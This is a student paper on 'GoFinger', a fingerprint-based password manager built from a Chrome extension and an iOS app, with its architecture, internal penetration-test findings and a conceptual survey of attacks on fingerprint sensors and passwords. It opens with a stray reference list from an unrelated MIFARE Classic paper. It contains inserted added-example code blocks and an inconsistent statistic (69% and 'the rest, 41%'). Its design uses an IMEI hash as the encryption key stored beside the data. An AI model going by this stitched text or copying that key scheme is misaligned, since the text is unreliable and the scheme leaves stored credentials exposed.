[1] Chen-Mou Cheng. 2010. MIFARE Classic: Completely Broken. Retrieved from: http://hitcon.org/download/2010/11_MIFARE%20Classic%20IS%20Completely%20Broken.pdf
[2] B.T Ulery, R.A Hicklin, J.A Buscalia, M.A Robertson. 2010. Accuracy and Reliability of Forensic Latent Fingerprint Decisions
[3] S. Rosenblatt, J. Cipriani. 2015. Two-factor authentication: What you need to know (FAQ). Retrieved from: https://www.cnet.com/news/two-factor-authentication-what-you-need-to-know-faq/
[4] Courtois, Nicolas T. 2019. The Dark Side of Security by Obscurity and Cloning MiFare Classic Rail and Building Passes Anywhere, Anytime
[5] Consumer Barometer research study. Retrieved from: https://www.consumerbarometer.com/en/graph-builder/?question=M1&filter=country:singapore
[6] https://en.wikipedia.org/wiki/YubiKey

APPENDIX

Figure 2: Sequence Diagram

Fingerprint Authentication System for Web Applications

Ye Kyaw Swa Aung Joshua
National University of Singapore
+65 90585542
a0124072@u.nus.edu

Chua Si Hao
National University of Singapore
+65 91508363
sihao@u.nus.edu

Choy Wan Ying Amanda
National University of Singapore
+65 91380402
e0008791@u.nus.edu.sg

Au-yong Xiang Rong Alwinson
National University of Singapore
+65 98165999
e0003957@u.nus.edu.sg

Adeeb Ashraf Bin Mirzha Alam Arif
National University of Singapore
+65 97715960
e0032076@u.nus.edu.sg

ABSTRACT
In this paper, we aim to explore the implementation and feasibility of a verification system for web applications that utilises biometric verification technology as an addition to the traditional username and password system that has already been widely implemented. While the traditional method of authentication with passwords has proven to be sufficient in the past, the proliferation of modern technology entails greater security risks and necessitates an improvement in the security systems that protect our valuable data. We also discuss how this biometric verification service functions to provide a supplementary layer of security and how it is comparably more convenient for users who are owners of smartphones with fingerprint scanners. We will also be analyzing the vulnerabilities of the current system in comparison to the proposed system, as well as the practicality of the proposed system in a realistic environment.

Categories and Subject Descriptors

General Terms
Passwords, Two Factor Authentication, Security

Keywords
Biometric, 2FA, TouchID, Chrome Extension, GoFinger

1. INTRODUCTION
Passwords have been used in securing systems even before computers were invented. They have been used to gain access to exclusive clubs and societies or even used to identify spies from allies during times of war. The modern day computed password was invented by Fernando Corbato[1] in the early 1960’s.

Passwords however have been broken time and time again through means such as brute-forcing, the use of rainbow tables and even social engineering. As computers get faster, it will take less time for a particular password to be cracked. In order to overcome this, security systems have introduced multi-factor authentication (MFA), the most common of which is two-factor authentication (2FA). Most 2FA systems take from at least 2 of the following categories: knowledge (something they know), possession (something they have), and inherence (something they are)[2]. However, with these improvements comes the cost of an extra step. Not only that, the adoption of 2FA is not widely enforced.

In our project, our aim is to create a security system which is universal and thus easy to implement, and which at the same time provides good security that matches today's required standards.

2. BACKGROUND

2.1 Biometric Authentication
In any secure system, user identification and authentication is a critical aspect of access control and should be examined in greater detail. Traditionally, user authentication is performed based on something the user knows (i.e. password, security questions) or something the user has (i.e. smartphone, token, magnetic card)[16]. However, the username-password paradigm is inherently weak due to a number of flaws. Firstly, since a username is only required to be unique rather than secret, usernames are typically chosen in the form of the user’s initial and last name (Donald Trump might have “dtrump” as his username), so a hacker can easily guess a person’s username using social network sites such as Facebook and LinkedIn. On the other hand, the strength of the password is reliant on user behaviour. A sufficiently long and strong password is unlikely to be cracked but it is also hard for the user to remember. According to a study done by keeper-security in 2016[4], about 17% of users still use “123456” as their password, and a huge number of people use dictionary words as their password and use the same password for multiple applications. The rise of password cracking tools such as keyloggers, network sniffers and GPU password cracking rigs makes passwords as a main security mechanism that much more undesirable.

Some of the limitations of passwords can be overcome by utilising a password manager such as LastPass, which stores all of the user’s usernames and passwords for each website in an encrypted vault which the user can then choose to store in the cloud or on their devices. This removes the weak passwords but essentially puts all eggs into a single basket. A compromised master password or a breach in the password manager could easily cause a huge amount of damage, making it a high risk high reward scheme.

Biometric authentication systems utilise measurable human physiological and behavioural characteristics as a form of verification of identity [3]. Examples of such characteristics include fingerprint, voice, iris and gait patterns. A powerful advantage of using biometric authentication over traditional password-based authentication systems is that biometric entities are intrinsically unique, unchangeable, non-duplicable and non-transferable [3]. Hence, they cannot be lost or forgotten and are less susceptible to low-level attacks such as shoulder surfing.

We have chosen to implement a fingerprint authentication system in conjunction with the traditional password system for this project as penetration of smartphones equipped with a fingerprint sensor is rising steadily, with an estimated 70% of all smartphones coming with one in 2018, compared to a mere 19% in 2014[6]. In a usability study by Bhagavatula et al., results showed that the iPhone fingerprint unlock feature had the highest adoption rate as compared to other biometric systems such as the Android face unlock. Of all participants who were current users of the iPhone fingerprint unlock feature, 69% cited convenience as a reason for adopting the iPhone fingerprint unlock while the rest (41%) stated security as a reason[3].

Figure 1: Security of Fingerprint Unlock vs. PIN from the perspective of former and current users of Fingerprint Unlock

Figure 2: Convenience of Fingerprint Unlock vs. PIN from the perspective of former and current users of Fingerprint Unlock

While our proposed system uses fingerprint authentication, it can also be implemented with other forms of biometric authentication. For example, recent trends such as the new release of iPhoneX have seen an incorporation of facial recognition as a biometric authentication system. Thus, a potential variant of our system could integrate facial recognition as an authentication system for web applications if facial recognition were to be incorporated into mobile technology on a wide scale.

2.2 Authentication for Web Applications
Solutions to help users manage passwords have become prevalent as the traditional method of entering a username and password becomes severely vulnerable to common attacks such as keyloggers and dictionary attacks, and to habits such as using short/easy passwords and even reusing passwords for many accounts. These vulnerabilities expose oblivious users to threats that could easily amount to identity theft.

For the purpose of this study, several recognized password managers were explored to understand the standards and implementation methods employed by them. The password managers to be reviewed are LastPass, 1Password and the browser’s default keystore.

2.2.1 LastPass
Acquired by LogMeIn. Inc, a reputable company founded in 2003, the LastPass password manager has been gaining popularity as a freemium model for these services. It offers premium and family upgrades, flaunting enhanced features to compete with its competitors.

Figure 3: LastPass - Password Manager Interface

2.2.2 1Password
1Password is the premium alternative to LastPass. Its intuitive interface and securities are its competitive advantage. Offering more than just a web-based product, 1Password is well-adopted for its desktop versions for both MacOS and Windows.

Figure 4: 1Password - Password Manager Interface

2.2.3 Browser’s Built-in Keystore
Familiar to many, major browsers such as Chrome, Firefox and Safari offer a mindless interface that prompts the user to save his/her password whenever a successful login is authenticated.

Figure 5 : Chrome Inbuilt - Password Manager Prompt

Gaining vast popularity in recent years, the use of password managers has been highly debatable, as mentioned earlier. However, the common understanding that password managers provide a higher level of security as compared to the repetitive use of similar or simple passwords is widely accepted. [7,8]

For the purpose of this study, we will not focus on the possibility of breaches and the security concerns that arise from the use of these managers, but on understanding their functionalities and implementation methods.

Manager      Authentication Method   MFA        Delivery Method
LastPass     Master Password         Optional   Cloud/Local
1Password    Master Password         Optional   Cloud-based
Browser      None                    No         Cloud-based

Figure 6 : Password Managers Summary

From the extracted table above, we can deduce that the common way of authenticating a user when he requests a password login is through the use of the Master Password. MFA options can be added to send verification codes and texts to the registered mobile phones & applications for enhanced security. However, the use of a weak master password or an unactivated MFA option would expose users to the similar vulnerability with higher risk - access to all credentials.

2.3 People and Password Management

People often play the most critical role in keeping passwords secure. Most password breaches come from poor password management practices that could have been prevented. A typical password strength requirement may look something like the following:
1. At least 8 characters long
2. Must contain at least one uppercase letter
3. Must contain at least one number
4. Must contain at least one symbol
Although the above is usually a good set of criteria for setting safe passwords, people often get frustrated and try to take the easy way out by still using passwords that are easy to break yet follow the above requirements. For example, “P@ssw0rd” satisfies all the requirements but is still clearly a dictionary word, making it relatively easy to crack. Making the requirements much more complicated, however, has been shown to increase user frustration [9] and lead users to resort to other measures in order to remember their password. A survey conducted by digitalguardian on 1000 internet users discovered that a vast majority of users write down complicated passwords on a piece of paper to help them remember. Other risky behavior that is also associated with difficult passwords includes reusing the same password across different accounts, keeping the password as a text file in the computer or keeping a file containing the password in a cloud based storage system such as Dropbox [10].

From this we can see that the complexity of passwords ultimately comes down to the tolerance and ability of the person himself. Having too complicated a password results in risky behaviour. Having too simple a password, although more user friendly, reduces the time taken by software to break a password significantly. Both can result in rendering a password useless.

In this study, we want to explore the alternative solutions to the typical use of Master Passwords and adopt other forms of authentication such as biometric systems on the phone. We also want to preserve what is accepted to be good practices in keeping passwords and at the same time ensure user-friendliness is maintained such that no risky behavior is attempted.

3. FINGERPRINT SECURITY SYSTEM
3.1 Fingerprint Scanner
In the 21st century, the most prevalent form of biometric authentication in many mobile devices is the fingerprint scanner. The concept of integrating fingerprint authentication with smartphones was introduced by Toshiba in 2007. Six years later, in 2013, this technology was further revolutionized by Apple Inc to become a better and more usable component of a smartphone - which is widely known as TouchID(TM).

Figure 7 : Apple Inc TouchID Logo

This concept of bringing biometric authentication into day-to-day gadgets was a breakthrough for mobile device security in terms of data privacy and protection.

Today, our team is bringing this biometric authentication beyond the scope of just mobile device authentication. We want to extrapolate its usage into another day-to-day authentication system known as 2 Factor Authentication.

Every fingerprint is unique, so it’s rare that even a small section of two separate fingerprints are alike enough to register as a match for Touch ID. The probability of this happening is 1 in 50,000 with a single, enrolled finger. And Touch ID allows only five unsuccessful fingerprint match attempts before you must enter your password. By comparison, the odds of guessing a typical 4-digit
passcode are 1 in 10,000. Although some codes, like “1234,” might be more easily guessed, there is no such thing as an easily guessable fingerprint pattern.

TouchID is made more secure with an advanced security architecture called Secure Enclave. It is a chip in the TouchID devices, which was developed to protect your passcode and fingerprint data. Touch ID doesn't store any images of your fingerprint, and instead relies only on a mathematical representation. It isn't possible for someone to reverse engineer the actual fingerprint image from this stored data.

The fingerprint data is encrypted, stored on device, and protected with a key available only to the Secure Enclave. The fingerprint data is used only by the Secure Enclave to verify that the fingerprint matches the enrolled fingerprint data. It can’t be accessed by the OS on your device or by any applications running on it. It's never stored on Apple servers, it's never backed up to iCloud or anywhere else, and it can't be used to match against other fingerprint databases.

3.2 Implementation
For the purpose of this feasibility study, we have adopted the concept from the latest series of MacBook Pro that offers an inbuilt TouchID system, which authenticates the user with a fingerprint when a login prompt is detected. The solution offers a high level of biometric security without compromising convenience. [7]

Figure 8 : Macbook Pro Touch ID

Extending the concept to web-based security, we enrolled the use of the iPhone’s TouchID capabilities and paired it with a Chrome extension to act as a simplified password manager. The further sections will explain each component and its usage in detail.

3.3 Component Architecture

Figure 9 : High-Level Component Communication Design

Required Components:
1. Phone Application (iOS)
2. Chrome Extension
3. Webservices
4. Secured server
5. Database/vault

3.3.1 Phone Application (iOS)
The phone application serves to authenticate the user with the phone's in-built biometric device (i.e. fingerprint sensor, TouchID). It will also be used to authenticate the One Time Password (OTP) from our server. The application can be visualized as TouchID on the Macbook Pro in the similar context described earlier.

Built on the latest technology of React Native, we harnessed its capabilities to scale this form factor to multiple platforms and access native hardware such as fingerprint sensors. For the purpose of this study, we will be focusing on the iOS version of the application to allow more time for testing and analysis of the completed product.

3.3.2 Chrome Extension
The key purpose of the Chrome extension is to detect a login request and extend the ability to authenticate the user when he encounters one. The user will be prompted with an additional login method, where it will send a request for the password to the secured server and to the phone for biometric authentication.

3.3.3 Web Services
These web services function as an interface between the Chrome extension and the phone application, fulfilling requests and sanctioning authorization. These web services are accessed only through HTTPS requests and require authenticated auth tokens to make requests for sensitive information.

3.3.4 Secured Server
These servers are configured with SSL certificates to ensure secure communication. The server is secured with hardening options and RSA-SSH keys are used for authentication. The root account is disabled.
*We have to make the assumption that the server is sufficiently secured to handle sensitive information for the proof-of-concept.

3.3.5 Database/Vault
The database is configured with access limited to only the secured server to prevent unauthorized requests. The database is also hardened to remove unauthorized access.
*Similarly, the assumption that the database is sufficiently secured is required to carry out the proof-of-concept.

3.4 Chrome Extension - Password Manager
The extension is built using the Google Chrome libraries and it adopts the architecture of a Browser Action extension. Its main functionalities are carried out in two main scripts which run in the browser background and in the browser content (the webpage itself) respectively. Both scripts are written in JavaScript in an object-oriented style, where important browser variables are encapsulated in the main controller object of the scripts. This prevents users from accessing the variables from the in-browser console. The Chrome extension talks to the server via the HTTPS based API endpoints and receives secure push-notifications from the server via FCM (Firebase Cloud Messaging) by Google. Furthermore, we closely studied an existing password manager, LastPass,
implementation of its chrome extension functionalities in the following areas:

3.4.1 Detection of the login form by the in-browser extension
This was done by iterating over the <form> DOM objects of the active page and picking the very first <form>. It is necessary to detect the login form DOM objects because the extension is tasked to inject a GoFinger fingerprint button into the form field so that users are able to use that fingerprint to authenticate. More details will be provided in the subsequent sections.

Figure 10A: After login form identification, Injection of GoFinger fingerprint onto the webpage

Figure 10B: Enlarged view of GoFinger fingerprint

3.4.2 Pairing of Mobile Number with the User’s Account

Figure 11: Pairing with mobile number

Figure 12: GoFinger OTP Request

The user's registered mobile number is used to verify the account via the extension. Once the mobile number has been verified by the GoFinger server, the extension will then request the OTP that is being sent to the provided number, to verify that the user who is requesting to log in via the Chrome extension indeed owns the device with the provided mobile number.

3.4.3 Request Credentials via Fingerprint

Figure 13: GoFinger Request Credential via two methods (In-browser or Extension Popup)

Upon the user clicking the fingerprint, the extension sends a request to the API endpoint and receives the push-notification via FCM (Firebase Cloud Messaging) once the user has authenticated his/her fingerprint via the GoFinger mobile app.

3.4.4 Detection of the input fields by the in-browser extension
When the extension receives the user’s credentials necessary for login, the extension will fill them into the appropriate inputs.

Detection of input fields was done by iterating over the DOM objects of the active page and identifying any input fields with a name containing any substring of the following variations (represented in JSON object format):

    {
      "username": ["email", "username", "name", "user"],
      "password": ["pass", "password"]
    }

Figure 14 : DOM Inputs with name containing substring “email” & “pass”

3.5 Go Finger Authentication App

Figure 15 : Detailed Phone Application (Finger) Flow
*You will be able to find an expanded version in the appendix for easy reference.

The above diagram illustrates the entire process flow of the mobile application. As indicated, the process can be isolated into four main sections: the login flow, authentication flow, register flow and the request received flow.

3.5.1 Login Flow
The login flow requires the user to enter a valid mobile number that he has possession of. The mobile and IMEI number are used as a unique identifier for the user. Once a valid mobile number is entered, a verification SMS is sent to authenticate if the user owns the phone number - similar to 2FA.

3.5.2 Authentication Flow
The authentication flow requires the user to input a randomly generated 6-digit number that he/she receives at the phone number specified earlier. The authentication code is only valid for two
minutes. If the user is able to provide the code, we can sufficiently believe that he has ownership of the mobile number indicated.

3.5.3 Registration Flow
Users that are new to the system will be sent to the registration flow. We will ask for his name for personalization and, more importantly, his/her email address that will help to recover his/her account when there is a change in the mobile number of the phone device itself (IMEI number changed).

3.5.4 Main Page
This page notifies the user that he/she is all set up and ready to use the system. He/she will be able to receive push notifications on requests sent from the Chrome extension counterpart. Once the notification is opened, it will lead the individual to the verification page. The app does not need to be opened to receive notifications.

3.5.5 Request Flow
The request flow is activated whenever a request from the Chrome extension counterpart is made by the user. A prompt to request an enrolled fingerprint is made. The user must have fingerprints enrolled and also a fingerprint scanner available on the phone. If these conditions are not met, the user will be denied access.

If the user is unable to verify himself through the fingerprint, he can request to retry. However, he will not be able to fall back to a PIN code password for authentication. Disabling the ability for this fallback helps to prevent unauthorized access by users who may know the authorized user’s passcode.

Once the authentication is made, the credentials are sent from the server back to the Chrome extension to log the user in. The success status page will be shown.

3.6 Information Transmission (How secure is it?)
3.6.1 Registering for Account
Registration of an account is only made available from the phone application. This is because the whole implementation will require the Chrome extension and phone to be paired. Without any of the above, the whole authentication process will not work. Removing unwanted account creation can prevent unauthorized users from causing unwanted issues.

The IMEI hash is stored in the database and used as a shared key for later encryption and decryption of the user’s credentials. Storing the hash also prevents the user from using unauthorized devices. Validation to ensure that the authentication comes from the correct device is carried out in every transaction.

3.6.2 Login
The login process on the Chrome extension will require a 6-digit validation. Once the user is validated, the secret key is returned and will be used in further transactions (to store and retrieve user credentials).

3.6.3 Storing Credentials
Users are prompted to save their login credentials with us when they log in to a new site successfully for the first time. These credentials are then encrypted with AES256 before being sent over to the server for safekeeping. No plaintext usernames or passwords are stored on the server.

3.6.4 Retrieving Credentials
When credentials are requested, the server will return the encrypted credentials back to the Chrome extension after the fingerprint authentication is successful. These credentials are then decrypted with the shared key that the Chrome extension stores. The Chrome extension will not store any credential.

3.6.5 Auth Token (Session Token)
Each request made to the server (from the phone application/Chrome extension) requires an authentication token to be verified. This auth token is only provided after the OTP is successfully verified. This token is made valid for 30 days to ensure freshness in the token. Without the auth token, the server will deny all access to any sensitive information.

3.6.6 Communications
All communications between the app/Chrome extension and the server and from the server to the database are secured using HTTPS. Servers are installed with SSL certificates signed by Comodo. This ensures that the data transferred is encrypted and secured.

3.6.7 Server Hardening / Database Hardening
Some of the precautions taken are as listed below.
1. Root Accounts are disabled
2. Password Access is disabled
3. Login only possible through SSH
4. Limit access of IP range to the server only
5. Only allow access to ports in use
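
The detection heuristic of sections 3.4.1 and 3.4.4 can be compared with a stricter variant on a sample page. This is an added example, not the GoFinger extension's code; the form descriptors, `detectStrict`, the "first match wins" reading of 3.4.4 and the sample page are assumptions constructed for illustration.

```javascript
// Added illustration, not the GoFinger extension's code.
// Substring lists as given in section 3.4.4.
const NAME_HINTS = {
  username: ['email', 'username', 'name', 'user'],
  password: ['pass', 'password'],
};

// Content-script adapter: reduce document.forms to plain descriptors so the
// matching logic below can be exercised without a browser.
function describeForms(doc) {
  return Array.from(doc.forms).map((form) => ({
    id: form.id,
    inputs: Array.from(form.elements)
      .filter((el) => el.tagName === 'INPUT')
      .map((el) => ({
        name: el.name,
        type: el.type,
        autocomplete: el.getAttribute('autocomplete') || '',
        element: el,
      })),
  }));
}

const nameMatches = (input, hints) =>
  hints.some((hint) => (input.name || '').toLowerCase().includes(hint));

// Heuristic as described: the button goes on the very first <form> (3.4.1);
// credentials go into inputs anywhere on the page whose name contains a
// listed substring (3.4.4). Taking the first match is an assumption.
function detectAsDescribed(forms) {
  if (forms.length === 0) return null;
  const allInputs = forms.flatMap((form) => form.inputs);
  return {
    buttonForm: forms[0],
    username: allInputs.find((i) => nameMatches(i, NAME_HINTS.username)) || null,
    password: allInputs.find((i) => nameMatches(i, NAME_HINTS.password)) || null,
  };
}

// Stricter variant (hypothetical): a login form has exactly one
// type="password" input. Zero means it is not a login form; two or more
// means sign-up or change-password. The username is the input marked
// autocomplete="username", else the closest text-like input before the
// password field, so both fields always come from the same form.
function detectStrict(forms) {
  const isTextLike = (i) => ['text', 'email', 'tel'].includes(i.type);
  for (const form of forms) {
    const passwords = form.inputs.filter((i) => i.type === 'password');
    if (passwords.length !== 1) continue;
    const pwIndex = form.inputs.indexOf(passwords[0]);
    const username =
      form.inputs.find((i) => isTextLike(i) && i.autocomplete === 'username') ||
      form.inputs.slice(0, pwIndex).reverse().find(isTextLike) ||
      null;
    if (username) return { form, username, password: passwords[0] };
  }
  return null;
}

// Constructed sample page: a booking form, the real login form, a sign-up form.
const SAMPLE_FORMS = [
  { id: 'booking', inputs: [
    { name: 'firstname', type: 'text' },
    { name: 'passport_no', type: 'text' },
  ] },
  { id: 'login', inputs: [
    { name: 'csrf', type: 'hidden' },
    { name: 'login_id', type: 'email', autocomplete: 'username' },
    { name: 'secret', type: 'password', autocomplete: 'current-password' },
  ] },
  { id: 'signup', inputs: [
    { name: 'email', type: 'email' },
    { name: 'password', type: 'password' },
    { name: 'password_confirm', type: 'password' },
  ] },
];
```

On the sample page the substring rule selects `firstname` and the visible text field `passport_no`, so a filled password would be displayed in clear text in the wrong form; the stricter rule selects only the login form's own fields.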
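
Section 3.6.1 uses the IMEI hash as the shared key for the credentials of sections 3.6.3 and 3.6.4, and section 4.1 records that an IMEI is not a secret. The following added example (not the project's code) bounds the entropy of such a key and shows one replacement; SHA-256 as the hash, AES-256-GCM as the mode, binding the record to the site origin, and all function names are assumptions of the example, since the paper says only "IMEI hash" and "AES256".

```javascript
// Added illustration, not the GoFinger project's code. Runs under Node.js.
const crypto = require('node:crypto');

// An IMEI is 15 decimal digits: an 8-digit TAC (identifies the device
// model), a 6-digit serial number and 1 Luhn check digit over the first 14.
function luhnCheckDigit(first14) {
  let sum = 0;
  for (let i = 0; i < first14.length; i++) {
    let d = first14.charCodeAt(i) - 48;
    if (i % 2 === 1) { // every second digit, starting from the rightmost of the 14
      d *= 2;
      if (d > 9) d -= 9;
    }
    sum += d;
  }
  return (10 - (sum % 10)) % 10;
}

function isValidImei(imei) {
  return /^\d{15}$/.test(imei) &&
    luhnCheckDigit(imei.slice(0, 14)) === Number(imei[14]);
}

// Upper bound on the entropy of ANY key derived only from an IMEI, however
// it is hashed: the check digit is computed, and the TAC follows from the
// phone model.
function imeiKeyEntropyBits(tacKnown) {
  const unknownDigits = tacKnown ? 6 : 14;
  return unknownDigits * Math.log2(10);
}

// Derivation as described in 3.6.1 (hash function assumed to be SHA-256).
function weakKeyFromImei(imei) {
  return crypto.createHash('sha256').update(imei).digest();
}

// Replacement: 256 random bits generated once at pairing time and kept on
// the paired devices only; the vault database stores sealed records, never
// the key.
function newDeviceKey() {
  return crypto.randomBytes(32);
}

// AES-256-GCM with a fresh 12-byte IV per record. The site origin is bound
// as associated data, so a record cannot be replayed for another site.
function sealCredential(key, origin, username, password) {
  const iv = crypto.randomBytes(12);
  const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);
  cipher.setAAD(Buffer.from(origin, 'utf8'));
  const plaintext = Buffer.from(JSON.stringify({ username, password }), 'utf8');
  const ct = Buffer.concat([cipher.update(plaintext), cipher.final()]);
  return {
    iv: iv.toString('base64'),
    tag: cipher.getAuthTag().toString('base64'),
    ct: ct.toString('base64'),
  };
}

// Throws if the key, the origin or any byte of the record does not match.
function openCredential(key, origin, record) {
  const decipher = crypto.createDecipheriv(
    'aes-256-gcm', key, Buffer.from(record.iv, 'base64'));
  decipher.setAAD(Buffer.from(origin, 'utf8'));
  decipher.setAuthTag(Buffer.from(record.tag, 'base64'));
  const pt = Buffer.concat([
    decipher.update(Buffer.from(record.ct, 'base64')),
    decipher.final(),
  ]);
  return JSON.parse(pt.toString('utf8'));
}

// Constructed sample value (not a real device): TAC 35000000, serial 123456.
const SAMPLE_IMEI = '35000000123456' + luhnCheckDigit('35000000123456');
```

With the device model known, the IMEI-derived key carries under 20 bits of entropy against 256 bits for the random key, which is the gap the "Reconsider other ways to create shared keys" entry in section 4.1 asks to close.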

4. ANALYSIS
Two sub-teams were formed from our group to represent the black-box and white-box hackers. The black-box hackers were given the functional packaged Chrome extension and exported phone application. The white-box hackers were provided both source code and the functional applications.
The objective of this testing is to analyse the vulnerabilities and loopholes that the developers may have overlooked. Vulnerabilities and test cases that were reported were patched and reviewed before iterating the process again.

4.1 Identified Vulnerabilities / Problems

Problem:  Decryption of credentials at server
          Developers decrypted the credentials for testing and did not remove it after development was completed.
Solution: Decryption codes were removed.
Reporter: White-box

Problem:  Single Point of Failure
          If the user does not own the mobile number, he will lose access to all his passwords.
Solution: Recovery email is included in registration and verified.
Reporter: Black-box

Problem:  Push Notification still received after logout
          The logout process only clears the user information on the device but does not block push notifications requesting to authenticate.
Solution: Ensure that the token is revoked on the server and remove the user from listening to updates when the user is logged out.
Reporter: Black-box

Problem:  IMEI as Shared Key Vulnerability
          IMEI numbers are not a well kept secret and can be easily retrieved by hackers. Using it as a shared key will make it easy to be exposed and exploited.
Solution: Reconsider other ways to create shared keys
Reporter: Special Mention to Prof Hugh

4.2 Suggestions (Future Plans)
As a security authentication feature, this implementation has to be secured to garner any trust from the community. The direct vulnerability we face at the moment is having the shared key in the same database as the encrypted data. Any exploit on the database will reveal the key along with the encrypted data, from which hackers can recover the original credentials.

To secure the key better, the next step is to improve the structure of the database. The vault that holds the credentials should be separated into multiple instances where the shared key and credentials are on different databases. Credentials can also be divided into small chunks where each database is only responsible for a small portion.

Therefore, the hacker will be required to hack through these secured databases with different authentications before being able to get hold of the whole credential.

5. VULNERABILITIES AND POSSIBLE ATTACKS
5.1 Fingerprint Authentication Vulnerabilities
The majority of smartphones use a capacitive sensor, which images a fingerprint by applying a voltage to a finger and measuring it electrically. Researchers from Michigan State University [11] have done a proof of concept of forging a fingerprint and bypassing a capacitive fingerprint sensor by using an inkjet printer loaded with conductive ink to print a spoofed fingerprint, and successfully bypassed even the highly regarded Apple Touch ID.

In addition, due to the small fingerprint sensor on smartphones, it is unable to capture the entire fingerprint and has to store partial fingerprints of each finger [12]. This results in significantly less security as compared to a bigger scanner capable of taking a full fingerprint image, as the likelihood of getting a match to 10 images is higher than a match from a single image.

Apart from the physical limitations and vulnerabilities of the fingerprint scanner, there are also attacks that can compromise the software used to authenticate the fingerprint data. For instance, an attacker may be able to modify the fingerprint authentication software to output an artificially high matching score such that an unauthorized user can gain access to the phone without the fingerprint of an authorized user [13]. Furthermore, the output of the fingerprint recognition software can also be modified, such that a negative match is overwritten to be a positive match.

5.2 Password Authentication Vulnerabilities
Our proposed system integrates the use of fingerprint authentication in conjunction with the existing password authentication systems that have been implemented by most web applications. However, this implies that our system still retains the potential vulnerabilities associated with the current password authentication system. Besides being susceptible to human errors, password authentication systems are also vulnerable to a wide variety of known attacks.

A popular password attack is the brute force attack, which is characterized by the generation of all possible combinations to find a string that matches the password. Typically, brute force attacks are used on encrypted passwords, where all possible combinations
of the password are generated and encrypted [15]. If the attacker manages to acquire a password file, it can be matched against the list of encrypted passwords to find the original password. Brute force attacks are very time consuming but are particularly effective for small passwords.

A variant of the brute force attack is the dictionary attack, where common or frequently occurring words are matched against the password instead of all possible combinations. While the dictionary attack is faster than the brute force attack, it is limited in scope and carries the possibility that the password may not be in the computed dictionary [15].

Another password attack is the replay attack, where an attacker can insert himself in the middle of the line of communication between client and server by replaying data packets during the authentication process.

Other known password attacks include shoulder surfing, phishing, key loggers etc.

5.3 Password Storage Vulnerabilities
Our system allows users to specify the credentials they wish to store at the beginning. It is ideal if they use a very complicated password or use a random password generator. However, a user may still use a simple password such as “password” for his account. The credentials are stored in a server that is encrypted using AES 256. The passwords are also appended with salt prior to encryption before being stored in the database. Therefore the only effective attack against our system would be bruteforcing and dictionary attacks.

Ideally, authentication and the storage of credentials would be done on separate servers; however, due to our limited resources we did it on the same server.

6. CONCLUSIONS
The main issue faced by today’s security systems is their reliance on passwords. Passwords are part of the knowledge category that requires humans to remember. However, a typical person can only remember passwords that may not be strong enough in the future. As a result, an intermediate medium to help people remember passwords comes into play, in forms ranging from written passwords to password managers. Although our solution removes the need for remembering passwords explicitly and makes it solely based on inherence and possession, the main vulnerability still lies within current systems that find it too difficult to migrate away from using a password altogether. This is due to the fact that making the jump relies on the user having a form or device that can validate their fingerprint at all times. As of 2017, 67% of all smartphones have a fingerprint scanner [12]. However, there are an estimated 2.32 billion smartphone users [14], which means a good chunk of people will be left out when the shift to biometrics begins. However, we believe that this shift is necessary, as the cracking of the plain password is systematic with simple tried and true methods given enough time. Cracking biometric systems currently requires specialised equipment and knowledge that not everyone possesses, and as biometric authentication systems become more accurate they will become harder to fool as well.

7. ACKNOWLEDGMENTS
We would like to thank Prof Hugh Anderson of National University of Singapore for giving us this opportunity to write this paper and providing constant guidance for our project. This research opportunity and his accompanying lectures have broadened our perspective towards security and bettered our understanding in the field.

8. REFERENCES
[1] Lisa Eadicicco. 2014. The Man Who Invented The Computer Password Admits That It's Become A Nightmare. (May 2014). Retrieved November 10, 2017 from http://www.businessinsider.com/inventor-of-the-password-2014-5

[2] Seth Rosenblatt, Jason Cipriani. 2013. Two-factor authentication: What you need to know (FAQ). (May 2013). Retrieved November 10, 2017 from https://www.cnet.com/news/two-factor-authentication-what-you-need-to-know-faq/

[3] Chandrasekhar Bhagavatula, Blase Ur, Kevin Iacovino, Su Mon Kywe, Lorrie Faith Cranor, and Marios Savvides. 2015. Biometric Authentication on iPhone and Android: Usability, Perceptions, and Influences on Adoption. Proceedings 2015 Workshop on Usable Security (2015). DOI:http://dx.doi.org/10.14722/usec.2015.23003

[4] Darren Guccione. The Most Common Passwords of 2016. Retrieved November 10, 2017 from https://keepersecurity.com/public/Most-Common-Passwords-of-2016-Keeper-Security-Study.pdf

[5] K. Brittain, R. Paquet. Determining the cost of a non-automated help desk. Gartner Research Group; 2003.

[6] Randy Abrams, Jerry Su, Pauline Chen, Thompson Wu, Derrick Yang, and Haas Liu. 2016. China Smartphones Sector. (January 2016). Retrieved November 10, 2017 from https://research-doc.credit-suisse.com/docView?sourceid=em&document_id=x675378&serialid=Y1p6aGBM4ca8YeQ5seIPCDUoDvUzjVc5p4c4dlQKcwU%3d

[7] Lory Gil. 2017. Why Touch ID makes the MacBook Pro the best Mac ever. (February 2017). Retrieved November 10, 2017 from https://www.imore.com/why-touch-id-makes-macbook-pro-best-mac-ever

[8] Kate Knibbs. 2015. Am I An Idiot for Still Using a Password Manager? (June 2015). Retrieved November 10, 2017 from https://gizmodo.com/am-i-an-idiot-for-still-using-a-password-manager-1711673486

[9] NIST Special Publication 800-63B: 2017. Retrieved November 10, 2017 from https://pages.nist.gov/800-63-3/sp800-63b.html#appA.

[10] Uncovering Password Habits: Are Users’ Password Security Habits Improving? (Infographic): 2017. Retrieved November 10, 2017 from https://digitalguardian.com/blog/uncovering-password-habits-are-users-password-security-habits-improving-infographic.

[11] Kai Cao and Anil K. Jain. Hacking Mobile Phones Using 2D Printed Fingerprints, Michigan.

[12] Aditi Roy, Nasir Memon, and Arun Ross. 2017. MasterPrint: Exploring the Vulnerability of Partial Fingerprint-Based Authentication Systems. IEEE Transactions on Information Forensics and Security 12, 9 (2017), 2013–2025. DOI:http://dx.doi.org/10.1109/tifs.2017.2691658

[13] Umut Uludag and Anil K. Jain. 2004. Attacks on biometric systems: a case study in fingerprints. Security, Steganography, and Watermarking of Multimedia Contents VI (2004). DOI:http://dx.doi.org/10.1117/12.530907

[14] Anon. Number of smartphone users worldwide 2014-2020. Retrieved November 10, 2017 from https://www.statista.com/statistics/330695/number-of-smartphone-users-worldwide/

[15] Raza, Mudassar et al. "A Survey Of Password Attacks And Comparative Analysis On Methods For Secure Authentication." World Applied Sciences Journal, 2012, doi:10.5829/idosi.wasj.2012.19.04.1837.

[16] Matyáš, Václav and Zdeněk Říha. Biometric Authentication - Security and Usability. Advanced Communications and Multimedia Security. (2002) Retrieved November 10, 2017 from http://www.fi.muni.cz/usr/matyas/cms_matyas_riha_biometrics.pdf

9. APPENDIX
